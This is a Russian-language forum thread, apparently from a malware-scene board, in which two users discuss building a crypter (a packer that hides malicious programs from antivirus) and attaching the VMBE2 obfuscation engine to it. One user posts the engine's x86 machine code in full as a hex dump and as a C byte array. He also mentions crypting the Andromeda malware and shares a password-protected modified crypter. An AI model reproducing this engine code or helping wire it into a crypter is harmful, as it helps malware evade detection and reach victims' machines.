ВАЖНО Делаем криптор вместе

[X-Shar]

Пассы на архивы находящиеся в архиве:на SRCrypt.rar-123,на VMBE2.zip-vx

VMBE2 - Как-раз искал, а он здесь оказался...

 

[denis7656]

Привет, у тебя получилось VMBE2 прикрутить к чему-нибудь ?

 

[X-Shar]

Привет, у тебя получилось VMBE2 прикрутить к чему-нибудь ?

Так пока и некчему прикручивать, только к исходнику криптора если ?

А так я ещё не разобрался с ним, так мельком минут наверное пять только сорцы глянул и всё...

 

[denis7656]

Так пока и некчему прикручивать, только к исходнику криптора если ?

А так я ещё не разобрался с ним, так мельком минут наверное пять только сорцы глянул и всё...

такая же тема.... На выходных попробую, отпишусь, и скину результаты работы, надеюсь, что все получется.

такая же тема.... На выходных попробую, отпишусь, и скину результаты работы, надеюсь, что все получется.

А пробовал ? там вроде асм вставки в код надо. Не ?
Если честно, то то кроме асма в архиве ничего не нашел. Автор сей темы, видимо, совсем гуру дизассемлинга, но лучше бы еще приколол пару примеров на ЯВУ.
Атам уж сами разобрались бы, но ту и так понятно что это все далеко не для широкого круга чуваков сделано =) ибо двужок видел только на двух хороших форумах.

 

[X-Shar]

А пробовал ? там вроде асм вставки в код надо. Не ?

Содня времени немножко было глянул, ну там-же есть примеры как подцеплять test1.exe, test2.exe, test3.exe.

Я не копенгаген в этом, но если глядели старые крипторы, там часто было что-то типо шелл-кода, т.е. представляем этот движок так:

Спойлер: Бинарный вид движка

Скопировать в буфер обмена

e9 6b 04 00 00 60 68 10 15 00 00 68 ff 01 01 10
68 55 ff ff ff 6a f8 68 a0 7f ff f8 68 0d c4 0e
0f 68 04 10 55 07 68 ff 05 d0 01 68 55 5d 0d 55
68 88 0f 5f 55 68 ff ff f3 f3 68 54 11 0c 0a 8b
d6 8b f4 6a 19 68 80 0b ac b0 68 3e f3 b1 bf 68
58 ea 11 00 8b dc 83 ec 70 8b fc fc 6a 64 59 0f
a3 0b d6 73 01 ac aa e2 f6 8b f2 6a 02 5b 8b d3
ac 50 50 3c 66 0f 44 d9 3c 67 0f 44 d1 3c ea 74
05 3c 9a 75 05 46 8d 74 33 03 3c c8 74 06 24 f7
3c c2 75 02 46 46 24 e7 3c 26 58 74 14 3c f1 74
0e 24 fc 3c a0 75 04 8d 74 32 02 3c f0 74 02 3c
64 58 74 bc 8b fc 52 50 3c 0f 75 01 ac 9c d4 10
86 cc 98 99 33 ed 9d 75 16 83 c7 35 e3 0d 0f a3
2f 73 01 42 45 e2 f7 72 02 d6 99 d1 e2 eb 18 80
e9 04 79 04 b1 0c 24 07 e3 0b 80 d2 01 45 0f a3
2f e2 f7 72 02 d0 e8 86 c8 8d 14 d1 59 5d 0f a3
57 02 73 3b ac d4 08 c0 e4 04 73 02 78 1f 9c 85
ed 75 06 2c 06 75 09 b0 05 3c 04 75 03 ac 24 07
9d 72 06 78 07 3c 05 75 04 03 f5 46 46 f6 c4 60
75 0d 91 3c f6 74 07 3c f7 75 04 03 f3 46 46 d1
e2 0f a3 57 13 73 0a 42 0f a3 57 13 73 02 13 f3
46 81 c4 b0 00 00 00 2b 74 24 04 89 74 24 1c 61
c3 55 8b ec 83 c4 f0 53 56 57 c7 45 f0 10 00 00
00 c7 45 f4 f0 f2 f3 2e c7 45 f8 3e 36 26 64 c7
45 fc 65 66 67 00 8b 75 08 fc 8d 55 f4 33 db ff
4d f0 75 06 33 c0 33 c9 eb 25 ac 8b fa 3c 67 b9
0b 00 00 00 75 03 80 cb 01 f2 ae 74 e2 4e 33 c0
0f b6 4e ff 2b 75 08 75 04 33 c9 eb 02 8b c6 8b
d3 5f 5e 5b c9 c2 04 00 55 8b ec 53 56 57 8b 5d
08 33 ff 0f b6 03 8b 75 10 8b d0 f6 d0 c0 c2 02
24 07 80 e2 03 74 0d fe ca 74 26 fe ca 74 46 8b
04 86 eb 66 3c 03 74 11 3c 02 74 05 8b 04 86 eb
4c 8b 43 01 83 c7 04 eb 44 e8 55 00 00 00 47 eb
3c 3c 03 74 18 8b 04 86 0f b6 54 1f 01 47 0f ba
f2 07 73 05 2d 80 00 00 00 03 c2 eb 20 e8 31 00
00 00 47 eb e3 3c 03 74 0c 8b 04 86 03 44 1f 01
83 c7 04 eb 08 e8 19 00 00 00 47 eb ef 83 7d 0c
64 75 05 64 8b 00 eb 02 8b 00 8b cf 5f 5e 5b c9
c2 0c 00 0f b6 43 01 8b c8 f6 d0 50 c0 c1 02 d1
e8 80 e1 03 24 1c 8b 04 30 d3 e0 59 80 e1 07 80
f9 02 75 0c 0a d2 75 08 03 43 02 83 c7 04 eb 03
03 04 8e c3 55 8b ec 83 65 08 0f 8b 45 08 8b 4d
0c 83 65 08 01 e8 0a 00 00 00 0f 92 c0 31 45 08
c9 c2 08 00 d1 e8 83 e0 07 74 38 fe c8 74 39 fe
c8 74 3a fe c8 74 45 fe c8 74 37 fe c8 74 38 fe
c8 74 09 fe c8 0f ba e1 06 73 01 c3 f7 c1 80 00
00 00 0f ba e1 0b 75 04 72 07 eb 02 73 03 33 c0
c3 f9 c3 0f ba e1 0b c3 0f ba e1 00 c3 0f ba e1
06 c3 0f ba e1 07 c3 0f ba e1 02 c3 f7 c1 41 00
00 00 75 dd c3 55 8b ec 53 8b 5d 08 0f b6 03 3c
0f 74 3b 3c 70 0f 82 9d 00 00 00 3c 7f 77 54 ff
75 0c 50 e8 5c ff ff ff 0f b6 43 01 75 05 83 c3
02 eb 19 0f ba f0 07 73 05 2d 80 00 00 00 8d 5c
03 02 0b d2 74 06 81 e3 ff ff 00 00 eb 63 0f b6
43 01 3c 80 72 62 3c 8f 77 5e ff 75 0c 50 e8 21
ff ff ff 75 05 83 c3 06 eb 07 8b 43 02 8d 5c 03
06 eb 3e 2c e0 8b 4d 10 72 3e 3c 03 77 3a 75 06
85 c9 74 9b eb 28 0b c9 74 24 48 75 09 0f ba 65
0c 06 73 8b eb 18 48 75 0d 0f ba 65 0c 06 0f 82
7b ff ff ff eb 08 85 c9 0f 85 71 ff ff ff 83 c3
02 8b c3 5b c9 c2 0c 00 33 c0 eb f7 55 8b ec 53
8b 5d 08 0f b6 03 3c eb 75 15 0f b6 43 01 0f ba
f0 07 73 05 2d 80 00 00 00 8d 44 03 02 eb 2f 3c
e9 75 09 8b 43 01 8d 44 03 05 eb 22 3c ff 75 1c
0f b6 43 01 24 38 c0 e8 03 3c 04 75 0f 43 ff 75
10 ff 75 0c 53 e8 ae fd ff ff eb 02 33 c0 5b c9
c2 0c 00 55 8b ec 53 8b 5d 08 0f b6 0b 80 f9 e8
75 0c 8d 48 05 8b 53 01 8d 44 13 05 eb 2b 80 f9
ff 75 24 0f b6 4b 01 80 e1 38 c0 e9 03 80 f9 02
75 15 50 43 ff 75 10 ff 75 0c 53 e8 68 fd ff ff
5a 8d 4c 0a 02 eb 02 33 c0 5b c9 c2 0c 00 58 c3
55 8b ec 83 c4 f4 53 56 57 8b 4d 18 64 a1 04 00
00 00 89 68 fc 89 65 fc 8b 45 1c 0b c9 74 07 ff
74 88 fc 49 75 f9 e8 0d 00 00 00 61 9d 8d 64 24
04 5f 5e 5b c9 c2 18 00 6a 00 9c 60 83 6d fc 28
83 7d 10 00 fc 74 16 54 ff 75 0c ff 75 14 ff 55
10 0b c0 74 08 8b 65 fc 83 c4 28 eb d4 8b 75 0c
e8 30 fb ff ff 8b d8 01 45 0c 56 e8 81 fc ff ff
89 4d f4 8d 3c 30 54 ff 75 f4 57 e8 dc fe ff ff
85 c0 0f 85 66 01 00 00 ff 74 24 18 ff 74 24 24
57 e8 0f fe ff ff 85 c0 0f 85 50 01 00 00 54 ff
75 f4 57 e8 0b ff ff ff 85 c0 74 17 8b 55 0c 50
8b fc 8d 77 04 b9 0a 00 00 00 f3 a5 89 17 e9 2b
01 00 00 80 3e ea 75 1b 66 83 7e 05 33 75 14 8b
4c 24 0c e8 1e 01 00 00 87 41 04 89 45 0c e9 90
00 00 00 80 3f c3 75 17 8b 44 24 28 8d 74 24 24
8d 7e 04 fd b9 0a 00 00 00 f3 a5 5a fc eb 22 80
3f c2 75 2b 8b 44 24 28 0f b7 57 01 fd 8d 74 24
24 8d 7c 32 04 b9 0a 00 00 00 f3 a5 8d 64 14 04
fc 39 65 fc 0f 86 01 ff ff ff e9 bf 00 00 00 80
3f 0f 75 1d 80 7f 01 34 75 17 8b 4c 24 14 e8 b3
00 00 00 87 01 89 45 0c 8b 44 24 14 83 c0 08 eb
26 80 3f cd 75 78 80 7f 01 2d 75 11 8b 7d 08 c7
07 cd 2d 90 90 ff 45 0c 83 c7 04 eb 68 80 7f 01
2e 75 5b 8b 44 24 14 64 8b 0d 04 00 00 00 39 44
24 0c 8b 7d 08 77 47 3b c1 73 43 83 78 08 01 8b
10 75 3b 39 54 24 0c 77 35 3b d1 73 31 81 3a 06
00 01 40 75 29 83 7a 10 02 75 23 8b 50 04 39 54
24 0c 77 1a 3b d1 73 16 81 3a 07 00 01 00 75 0e
e8 31 00 00 00 87 82 b8 00 00 00 89 45 0c 8b cb
8b 7d 08 f3 a4 e8 1c 00 00 00 8b 4d 08 c6 07 68
89 47 01 c6 47 05 c3 89 4c 24 24 61 9d c3 89 45
0c e9 4a fe ff ff e8 03 fe ff ff 6a 00 9c 60 64
8b 2d 04 00 00 00 8b 6d fc e9 32 fe ff

В си это будет примерно так:

Спойлер: Код в Си

Скопировать в буфер обмена

char Data[2560] = {0xE9, 0x6B, 0x04, 0x00, 0x00, 0x60, 0x68, 0x10, 0x15, 0x00,
0x00, 0x68, 0xFF, 0x01, 0x01, 0x10, 0x68, 0x55, 0xFF, 0xFF,
0xFF, 0x6A, 0xF8, 0x68, 0xA0, 0x7F, 0xFF, 0xF8, 0x68, 0x0D,
0xC4, 0x0E, 0x0F, 0x68, 0x04, 0x10, 0x55, 0x07, 0x68, 0xFF,
0x05, 0xD0, 0x01, 0x68, 0x55, 0x5D, 0x0D, 0x55, 0x68, 0x88,
0x0F, 0x5F, 0x55, 0x68, 0xFF, 0xFF, 0xF3, 0xF3, 0x68, 0x54,
0x11, 0xC, 0xA, 0x8B, 0xD6, 0x8B, 0xF4, 0x6A, 0x19, 0x68,
0x80, 0xB, 0xAC, 0xB0, 0x68, 0x3E, 0xF3, 0xB1, 0xBF, 0x68,
0x58, 0xEA, 0x11, 0x0, 0x8B, 0xDC, 0x83, 0xEC, 0x70, 0x8B,
0xFC, 0xFC, 0x6A, 0x64, 0x59, 0xF, 0xA3, 0xB, 0xD6, 0x73,
0x1, 0xAC, 0xAA, 0xE2, 0xF6, 0x8B, 0xF2, 0x6A, 0x2, 0x5B,
0x8B, 0xD3, 0xAC, 0x50, 0x50, 0x3C, 0x66, 0xF, 0x44, 0xD9,
0x3C, 0x67, 0xF, 0x44, 0xD1, 0x3C, 0xEA, 0x74, 0x5, 0x3C,
0x9A, 0x75, 0x5, 0x46, 0x8D, 0x74, 0x33, 0x3, 0x3C, 0xC8,
0x74, 0x6, 0x24, 0xF7, 0x3C, 0xC2, 0x75, 0x2, 0x46, 0x46,
0x24, 0xE7, 0x3C, 0x26, 0x58, 0x74, 0x14, 0x3C, 0xF1, 0x74,
0xE, 0x24, 0xFC, 0x3C, 0xA0, 0x75, 0x4, 0x8D, 0x74, 0x32,
0x2, 0x3C, 0xF0, 0x74, 0x2, 0x3C, 0x64, 0x58, 0x74, 0xBC,
0x8B, 0xFC, 0x52, 0x50, 0x3C, 0xF, 0x75, 0x1, 0xAC, 0x9C,
0xD4, 0x10, 0x86, 0xCC, 0x98, 0x99, 0x33, 0xED, 0x9D, 0x75,
0x16, 0x83, 0xC7, 0x35, 0xE3, 0xD, 0xF, 0xA3, 0x2F, 0x73,
0x1, 0x42, 0x45, 0xE2, 0xF7, 0x72, 0x2, 0xD6, 0x99, 0xD1,
0xE2, 0xEB, 0x18, 0x80, 0xE9, 0x4, 0x79, 0x4, 0xB1, 0xC,
0x24, 0x7, 0xE3, 0xB, 0x80, 0xD2, 0x1, 0x45, 0xF, 0xA3,
0x2F, 0xE2, 0xF7, 0x72, 0x2, 0xD0, 0xE8, 0x86, 0xC8, 0x8D,
0x14, 0xD1, 0x59, 0x5D, 0xF, 0xA3, 0x57, 0x2, 0x73, 0x3B,
0xAC, 0xD4, 0x8, 0xC0, 0xE4, 0x4, 0x73, 0x2, 0x78, 0x1F,
0x9C, 0x85, 0xED, 0x75, 0x6, 0x2C, 0x6, 0x75, 0x9, 0xB0,
0x5, 0x3C, 0x4, 0x75, 0x3, 0xAC, 0x24, 0x7, 0x9D, 0x72,
0x6, 0x78, 0x7, 0x3C, 0x5, 0x75, 0x4, 0x3, 0xF5, 0x46,
0x46, 0xF6, 0xC4, 0x60, 0x75, 0xD, 0x91, 0x3C, 0xF6, 0x74,
0x7, 0x3C, 0xF7, 0x75, 0x4, 0x3, 0xF3, 0x46, 0x46, 0xD1,
0xE2, 0xF, 0xA3, 0x57, 0x13, 0x73, 0xA, 0x42, 0xF, 0xA3,
0x57, 0x13, 0x73, 0x2, 0x13, 0xF3, 0x46, 0x81, 0xC4, 0xB0,
0x0, 0x0, 0x0, 0x2B, 0x74, 0x24, 0x4, 0x89, 0x74, 0x24,
0x1C, 0x61, 0xC3, 0x55, 0x8B, 0xEC, 0x83, 0xC4, 0xF0, 0x53,
0x56, 0x57, 0xC7, 0x45, 0xF0, 0x10, 0x0, 0x0, 0x0, 0xC7,
0x45, 0xF4, 0xF0, 0xF2, 0xF3, 0x2E, 0xC7, 0x45, 0xF8, 0x3E,
0x36, 0x26, 0x64, 0xC7, 0x45, 0xFC, 0x65, 0x66, 0x67, 0x00,
0x8B, 0x75, 0x8, 0xFC, 0x8D, 0x55, 0xF4, 0x33, 0xdb, 0xFF,
0x4D, 0xF0, 0x75, 0x6, 0x33, 0xC0, 0x33, 0xC9, 0xEB, 0x25,
0xAC, 0x8B, 0xFA, 0x3C, 0x67, 0xB9, 0xB, 0x0, 0x0, 0x00,
0x75, 0x3, 0x80, 0xCB, 0x1, 0xF2, 0xAE, 0x74, 0xE2, 0x4E,
0x33, 0xC0, 0xF, 0xB6, 0x4E, 0xFF, 0x2B, 0x75, 0x8, 0x75,
0x4, 0x33, 0xC9, 0xEB, 0x2, 0x8B, 0xC6, 0x8B, 0xD3, 0x5F,
0x5E, 0x5B, 0xC9, 0xC2, 0x4, 0x0, 0x55, 0x8B, 0xEC, 0x53,
0x56, 0x57, 0x8B, 0x5D, 0x8, 0x33, 0xFF, 0xF, 0xB6, 0x3,
0x8B, 0x75, 0x10, 0x8B, 0xD0, 0xF6, 0xD0, 0xC0, 0xC2, 0x2,
0x24, 0x7, 0x80, 0xE2, 0x3, 0x74, 0xD, 0xFE, 0xCA, 0x74,
0x26, 0xFE, 0xCA, 0x74, 0x46, 0x8B, 0x4, 0x86, 0xEB, 0x66,
0x3C, 0x3, 0x74, 0x11, 0x3C, 0x2, 0x74, 0x5, 0x8B, 0x4,
0x86, 0xEB, 0x4C, 0x8B, 0x43, 0x1, 0x83, 0xC7, 0x4, 0xEB,
0x44, 0xE8, 0x55, 0x0, 0x0, 0x0, 0x47, 0xEB, 0x3C, 0x3C,
0x3, 0x74, 0x18, 0x8B, 0x4, 0x86, 0xF, 0xB6, 0x54, 0x1F,
0x1, 0x47, 0xF, 0xBA, 0xF2, 0x7, 0x73, 0x5, 0x2D, 0x80,
0x0, 0x0, 0x0, 0x3, 0xC2, 0xEB, 0x20, 0xE8, 0x31, 0x00,
0x0, 0x0, 0x47, 0xEB, 0xE3, 0x3C, 0x3, 0x74, 0xC, 0x8B,
0x4, 0x86, 0x3, 0x44, 0x1F, 0x1, 0x83, 0xC7, 0x4, 0xEB,
0x8, 0xE8, 0x19, 0x0, 0x0, 0x0, 0x47, 0xEB, 0xEF, 0x83,
0x7D, 0xC, 0x64, 0x75, 0x5, 0x64, 0x8B, 0x0, 0xEB, 0x2,
0x8B, 0x0, 0x8B, 0xCF, 0x5F, 0x5E, 0x5B, 0xC9, 0xC2, 0x0c,
0x0, 0xF, 0xB6, 0x43, 0x01, 0x8B, 0xC8, 0xF6, 0xD0, 0x50,
0xC0, 0xC1, 0x2, 0xD1, 0xE8, 0x80, 0xE1, 0x3, 0x24, 0x1C,
0x8B, 0x4, 0x30, 0xD3, 0xE0, 0x59, 0x80, 0xE1, 0x7, 0x80,
0xF9, 0x2, 0x75, 0xC, 0xA, 0xD2, 0x75, 0x8, 0x3, 0x43,
0x2, 0x83, 0xC7, 0x4, 0xEB, 0x3, 0x3, 0x4, 0x8E, 0xC3,
0x55, 0x8B, 0xEC, 0x83, 0x65, 0x8, 0xF, 0x8B, 0x45, 0x08,
0x8B, 0x4D, 0xC, 0x83, 0x65, 0x8, 0x1, 0xE8, 0xA, 0x00,
0x0, 0x0, 0xF, 0x92, 0xC0, 0x31, 0x45, 0x8, 0xC9, 0xC2,
0x8, 0x0, 0xD1, 0xE8, 0x83, 0xE0, 0x7, 0x74, 0x38, 0xFE,
0xC8, 0x74, 0x39, 0xFE, 0xC8, 0x74, 0x3A, 0xFE, 0xC8, 0x74,
0x45, 0xFE, 0xC8, 0x74, 0x37, 0xFE, 0xC8, 0x74, 0x38, 0xFE,
0xC8, 0x74, 0x9, 0xFE, 0xC8, 0xF, 0xBA, 0xE1, 0x6, 0x73,
0x1, 0xC3, 0xF7, 0xC1, 0x80, 0x0, 0x0, 0x0, 0xF, 0xBA,
0xE1, 0xB, 0x75, 0x4, 0x72, 0x7, 0xEB, 0x2, 0x73, 0x3,
0x33, 0xC0, 0xC3, 0xF9, 0xC3, 0xF, 0xBA, 0xE1, 0xB, 0xC3,
0xF, 0xBA, 0xE1, 0x0, 0xC3, 0xF, 0xBA, 0xE1, 0x6, 0xC3,
0xF, 0xBA, 0xE1, 0x7, 0xC3, 0xF, 0xBA, 0xE1, 0x2, 0xC3,
0xF7, 0xC1, 0x41, 0x0, 0x0, 0x0, 0x75, 0xDD, 0xC3, 0x55,
0x8B, 0xEC, 0x53, 0x8B, 0x5D, 0x8, 0xF, 0xB6, 0x3, 0x3C,
0xF, 0x74, 0x3B, 0x3C, 0x70, 0xF, 0x82, 0x9D, 0x0, 0x0,
0x0, 0x3C, 0x7F, 0x77, 0x54, 0xFF, 0x75, 0xC, 0x50, 0xE8,
0x5C, 0xFF, 0xFF, 0xFF, 0xF, 0xB6, 0x43, 0x01, 0x75, 0x5,
0x83, 0xC3, 0x2, 0xEB, 0x19, 0xF, 0xBA, 0xF0, 0x7, 0x73,
0x5, 0x2D, 0x80, 0x0, 0x0, 0x0, 0x8D, 0x5C, 0x3, 0x2,
0xB, 0xD2, 0x74, 0x6, 0x81, 0xE3, 0xFF, 0xFF, 0x0, 0x00,
0xEB, 0x63, 0xF, 0xB6, 0x43, 0x01, 0x3C, 0x80, 0x72, 0x62,
0x3C, 0x8F, 0x77, 0x5E, 0xFF, 0x75, 0xC, 0x50, 0xE8, 0x21,
0xFF, 0xFF, 0xFF, 0x75, 0x5, 0x83, 0xC3, 0x6, 0xEB, 0x7,
0x8B, 0x43, 0x2, 0x8D, 0x5C, 0x3, 0x6, 0xEB, 0x3E, 0x2C,
0xE0, 0x8B, 0x4D, 0x10, 0x72, 0x3E, 0x3C, 0x3, 0x77, 0x3A,
0x75, 0x6, 0x85, 0xC9, 0x74, 0x9B, 0xEB, 0x28, 0xB, 0xC9,
0x74, 0x24, 0x48, 0x75, 0x9, 0xF, 0xBA, 0x65, 0xC, 0x6,
0x73, 0x8B, 0xEB, 0x18, 0x48, 0x75, 0xD, 0xF, 0xBA, 0x65,
0xC, 0x6, 0xF, 0x82, 0x7B, 0xFF, 0xFF, 0xFF, 0xEB, 0x8,
0x85, 0xC9, 0xF, 0x85, 0x71, 0xFF, 0xFF, 0xFF, 0x83, 0xC3,
0x2, 0x8B, 0xC3, 0x5B, 0xC9, 0xC2, 0xC, 0x0, 0x33, 0xC0,
0xEB, 0xF7, 0x55, 0x8B, 0xEC, 0x53, 0x8B, 0x5D, 0x8, 0xF,
0xB6, 0x3, 0x3C, 0xEB, 0x75, 0x15, 0xF, 0xB6, 0x43, 0x01,
0xF, 0xBA, 0xF0, 0x7, 0x73, 0x5, 0x2D, 0x80, 0x0, 0x00,
0x0, 0x8D, 0x44, 0x3, 0x2, 0xEB, 0x2F, 0x3C, 0xE9, 0x75,
0x9, 0x8B, 0x43, 0x1, 0x8D, 0x44, 0x3, 0x5, 0xEB, 0x22,
0x3C, 0xFF, 0x75, 0x1C, 0xF, 0xB6, 0x43, 0x1, 0x24, 0x38,
0xC0, 0xE8, 0x3, 0x3C, 0x4, 0x75, 0xF, 0x43, 0xFF, 0x75,
0x10, 0xFF, 0x75, 0xC, 0x53, 0xE8, 0xAE, 0xFD, 0xFF, 0xFF,
0xEB, 0x2, 0x33, 0xC0, 0x5B, 0xC9, 0xC2, 0xC, 0x0, 0x55,
0x8B, 0xEC, 0x53, 0x8B, 0x5D, 0x8, 0xF, 0xB6, 0xB, 0x80,
0xF9, 0xE8, 0x75, 0xC, 0x8D, 0x48, 0x5, 0x8B, 0x53, 0x1,
0x8D, 0x44, 0x13, 0x5, 0xEB, 0x2B, 0x80, 0xF9, 0xFF, 0x75,
0x24, 0xF, 0xB6, 0x4B, 0x1, 0x80, 0xE1, 0x38, 0xC0, 0xE9,
0x3, 0x80, 0xF9, 0x2, 0x75, 0x15, 0x50, 0x43, 0xFF, 0x75,
0x10, 0xFF, 0x75, 0xC, 0x53, 0xE8, 0x68, 0xFD, 0xFF, 0xFF,
0x5A, 0x8D, 0x4C, 0xA, 0x2, 0xEB, 0x2, 0x33, 0xC0, 0x5B,
0xC9, 0xC2, 0xC, 0x0, 0x58, 0xC3, 0x55, 0x8B, 0xEC, 0x83,
0xC4, 0xF4, 0x53, 0x56, 0x57, 0x8B, 0x4D, 0x18, 0x64, 0xA1,
0x4, 0x0, 0x0, 0x0, 0x89, 0x68, 0xFC, 0x89, 0x65, 0xFC,
0x8B, 0x45, 0x1C, 0xB, 0xC9, 0x74, 0x7, 0xFF, 0x74, 0x88,
0xFC, 0x49, 0x75, 0xF9, 0xE8, 0xD, 0x0, 0x0, 0x0, 0x61,
0x9D, 0x8D, 0x64, 0x24, 0x4, 0x5F, 0x5E, 0x5B, 0xC9, 0xC2,
0x18, 0x0, 0x6A, 0x0, 0x9C, 0x60, 0x83, 0x6D, 0xFC, 0x28,
0x83, 0x7D, 0x10, 0x0, 0xFC, 0x74, 0x16, 0x54, 0xFF, 0x75,
0xC, 0xFF, 0x75, 0x14, 0xFF, 0x55, 0x10, 0xB, 0xC0, 0x74,
0x8, 0x8B, 0x65, 0xFC, 0x83, 0xC4, 0x28, 0xEB, 0xD4, 0x8B,
0x75, 0xC, 0xE8, 0x30, 0xFB, 0xFF, 0xFF, 0x8B, 0xD8, 0x1,
0x45, 0xC, 0x56, 0xE8, 0x81, 0xFC, 0xFF, 0xFF, 0x89, 0x4D,
0xF4, 0x8D, 0x3C, 0x30, 0x54, 0xFF, 0x75, 0xF4, 0x57, 0xE8,
0xDC, 0xFE, 0xFF, 0xFF, 0x85, 0xC0, 0xF, 0x85, 0x66, 0x1,
0x0, 0x0, 0xFF, 0x74, 0x24, 0x18, 0xFF, 0x74, 0x24, 0x24,
0x57, 0xE8, 0xF, 0xFE, 0xFF, 0xFF, 0x85, 0xC0, 0xF, 0x85,
0x50, 0x1, 0x0, 0x0, 0x54, 0xFF, 0x75, 0xF4, 0x57, 0xE8,
0xB, 0xFF, 0xFF, 0xFF, 0x85, 0xC0, 0x74, 0x17, 0x8B, 0x55,
0xC, 0x50, 0x8B, 0xFC, 0x8D, 0x77, 0x4, 0xB9, 0xA, 0x00,
0x0, 0x0, 0xF3, 0xA5, 0x89, 0x17, 0xE9, 0x2B, 0x1, 0x00,
0x0, 0x80, 0x3E, 0xEA, 0x75, 0x1B, 0x66, 0x83, 0x7E, 0x5,
0x33, 0x75, 0x14, 0x8B, 0x4C, 0x24, 0xC, 0xE8, 0x1E, 0x1,
0x0, 0x0, 0x87, 0x41, 0x4, 0x89, 0x45, 0xC, 0xE9, 0x90,
0x0, 0x0, 0x0, 0x80, 0x3F, 0xC3, 0x75, 0x17, 0x8B, 0x44,
0x24, 0x28, 0x8D, 0x74, 0x24, 0x24, 0x8D, 0x7E, 0x4, 0xFD,
0xB9, 0xA, 0x0, 0x0, 0x0, 0xF3, 0xA5, 0x5A, 0xFC, 0xEB,
0x22, 0x80, 0x3F, 0xC2, 0x75, 0x2B, 0x8B, 0x44, 0x24, 0x28,
0xF, 0xB7, 0x57, 0x1, 0xFD, 0x8D, 0x74, 0x24, 0x24, 0x8D,
0x7C, 0x32, 0x4, 0xB9, 0xA, 0x0, 0x0, 0x0, 0xF3, 0xA5,
0x8D, 0x64, 0x14, 0x4, 0xFC, 0x39, 0x65, 0xFC, 0xF, 0x86,
0x1, 0xFF, 0xFF, 0xFF, 0xE9, 0xBF, 0x0, 0x0, 0x0, 0x80,
0x3F, 0xF, 0x75, 0x1D, 0x80, 0x7F, 0x1, 0x34, 0x75, 0x17,
0x8B, 0x4C, 0x24, 0x14, 0xE8, 0xB3, 0x0, 0x0, 0x0, 0x87,
0x1, 0x89, 0x45, 0xC, 0x8B, 0x44, 0x24, 0x14, 0x83, 0xC0,
0x8, 0xEB, 0x26, 0x80, 0x3F, 0xCD, 0x75, 0x78, 0x80, 0x7F,
0x1, 0x2D, 0x75, 0x11, 0x8B, 0x7D, 0x8, 0xC7, 0x7, 0xCD,
0x2D, 0x90, 0x90, 0xFF, 0x45, 0xC, 0x83, 0xC7, 0x4, 0xEB,
0x68, 0x80, 0x7F, 0x1, 0x2E, 0x75, 0x5B, 0x8B, 0x44, 0x24,
0x14, 0x64, 0x8B, 0xD, 0x4, 0x0, 0x0, 0x0, 0x39, 0x44,
0x24, 0xC, 0x8B, 0x7D, 0x8, 0x77, 0x47, 0x3B, 0xC1, 0x73,
0x43, 0x83, 0x78, 0x8, 0x1, 0x8B, 0x10, 0x75, 0x3B, 0x39,
0x54, 0x24, 0xC, 0x77, 0x35, 0x3B, 0xD1, 0x73, 0x31, 0x81,
0x3A, 0x6, 0x0, 0x1, 0x40, 0x75, 0x29, 0x83, 0x7A, 0x10,
0x2, 0x75, 0x23, 0x8B, 0x50, 0x4, 0x39, 0x54, 0x24, 0xC,
0x77, 0x1A, 0x3B, 0xD1, 0x73, 0x16, 0x81, 0x3A, 0x7, 0x00,
0x1, 0x0, 0x75, 0xE, 0xE8, 0x31, 0x0, 0x0, 0x0, 0x87,
0x82, 0xB8, 0x0, 0x0, 0x0, 0x89, 0x45, 0xC, 0x8B, 0xCB,
0x8B, 0x7D, 0x8, 0xF3, 0xA4, 0xE8, 0x1C, 0x0, 0x0, 0x00,
0x8B, 0x4D, 0x8, 0xC6, 0x7, 0x68, 0x89, 0x47, 0x1, 0xC6,
0x47, 0x5, 0xC3, 0x89, 0x4C, 0x24, 0x24, 0x61, 0x9D, 0xC3,
0x89, 0x45, 0xC, 0xE9, 0x4A, 0xFE, 0xFF, 0xFF, 0xE8, 0x3,
0xFE, 0xFF, 0xFF, 0x6A, 0x0, 0x9C, 0x60, 0x64, 0x8B, 0x2D,
0x4, 0x0, 0x0, 0x0, 0x8B, 0x6D, 0xFC, 0xE9, 0x32, 0xFE,
0xFF, 0xFF};

Далее можно как в примере test3.exe с ним работать, только у меня почему-то он крашится...

У меня проблема возникла, что я не хера не понял что делает этот двиг, и по сему что-бы его подключить нужны экстросенсорные навыки, гы-гы...

Но нашёл мега-нубский и дурацкий способ его присобачить к криптору, модифицировал свой исходник на си, только я не пойму то-ли он не сработал, то-ли сработал но не правильно...

Короче смотрите крипт Андромеды:

Вы должны зарегистрироваться, чтобы увидеть внешние ссылки

Выложил сам модифицированный криптор, пароль:111

Сам исходник не хочу даже и класть, что-бы не позорится, если здесь появится Инди, чувствую придётся обтикать, ибо нефига движок портить...

Пароль:111

 

[denis7656]

Содня времени немножко было глянул, ну там-же есть примеры как подцеплять test1.exe, test2.exe, test3.exe.

Я не копенгаген в этом, но если глядели старые крипторы, там часто было что-то типо шелл-кода, т.е. представляем этот движок так:

Спойлер: Бинарный вид движка

Скопировать в буфер обмена

e9 6b 04 00 00 60 68 10 15 00 00 68 ff 01 01 10
68 55 ff ff ff 6a f8 68 a0 7f ff f8 68 0d c4 0e
0f 68 04 10 55 07 68 ff 05 d0 01 68 55 5d 0d 55
68 88 0f 5f 55 68 ff ff f3 f3 68 54 11 0c 0a 8b
d6 8b f4 6a 19 68 80 0b ac b0 68 3e f3 b1 bf 68
58 ea 11 00 8b dc 83 ec 70 8b fc fc 6a 64 59 0f
a3 0b d6 73 01 ac aa e2 f6 8b f2 6a 02 5b 8b d3
ac 50 50 3c 66 0f 44 d9 3c 67 0f 44 d1 3c ea 74
05 3c 9a 75 05 46 8d 74 33 03 3c c8 74 06 24 f7
3c c2 75 02 46 46 24 e7 3c 26 58 74 14 3c f1 74
0e 24 fc 3c a0 75 04 8d 74 32 02 3c f0 74 02 3c
64 58 74 bc 8b fc 52 50 3c 0f 75 01 ac 9c d4 10
86 cc 98 99 33 ed 9d 75 16 83 c7 35 e3 0d 0f a3
2f 73 01 42 45 e2 f7 72 02 d6 99 d1 e2 eb 18 80
e9 04 79 04 b1 0c 24 07 e3 0b 80 d2 01 45 0f a3
2f e2 f7 72 02 d0 e8 86 c8 8d 14 d1 59 5d 0f a3
57 02 73 3b ac d4 08 c0 e4 04 73 02 78 1f 9c 85
ed 75 06 2c 06 75 09 b0 05 3c 04 75 03 ac 24 07
9d 72 06 78 07 3c 05 75 04 03 f5 46 46 f6 c4 60
75 0d 91 3c f6 74 07 3c f7 75 04 03 f3 46 46 d1
e2 0f a3 57 13 73 0a 42 0f a3 57 13 73 02 13 f3
